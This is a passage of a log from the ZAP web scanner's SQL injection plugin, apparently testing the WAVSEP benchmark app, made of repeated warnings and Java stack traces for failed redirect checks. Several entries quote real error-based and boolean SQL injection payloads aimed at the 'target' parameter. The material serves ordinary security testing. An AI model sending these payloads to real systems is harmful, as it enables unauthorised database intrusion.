org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6128=6128) THEN 6128 ELSE 6128*(SELECT 6128 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (6128=6128) THEN 6128 ELSE 6128*(SELECT 6128 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680622 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3994=4433-- JLCl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3994=4433-- JLCl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680623 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3481=8645) THEN 3481 ELSE 3481*(SELECT 3481 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (3481=8645) THEN 3481 ELSE 3481*(SELECT 3481 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680623 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1333=3551) THEN 1333 ELSE 1333*(SELECT 1333 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (1333=3551) THEN 1333 ELSE 1333*(SELECT 1333 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680625 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT 5290 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5290=5290,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8693=8693] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 5290 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5290=5290,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8693=8693 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680626 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6648=6648) THEN 6648 ELSE 6648*(SELECT 6648 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (6648=6648) THEN 6648 ELSE 6648*(SELECT 6648 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680626 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6480=6480,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6480=6480,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680627 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1333=3551) THEN 1333 ELSE 1333*(SELECT 1333 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (1333=3551) THEN 1333 ELSE 1333*(SELECT 1333 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680627 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT 3995 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3995=3995,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Uqba'='Uqba] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 3995 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3995=3995,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Uqba'='Uqba at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680628 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 5931 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5931=5931,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2943=2943] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 5931 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5931=5931,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2943=2943 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680629 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT 2737 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2737=2737,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'OFsg'='OFsg] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 2737 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2737=2737,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'OFsg'='OFsg at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680630 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT 5751 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5751=5751,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 5751 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5751=5751,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680630 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 2183 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2183=2183,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 2183 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2183=2183,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: 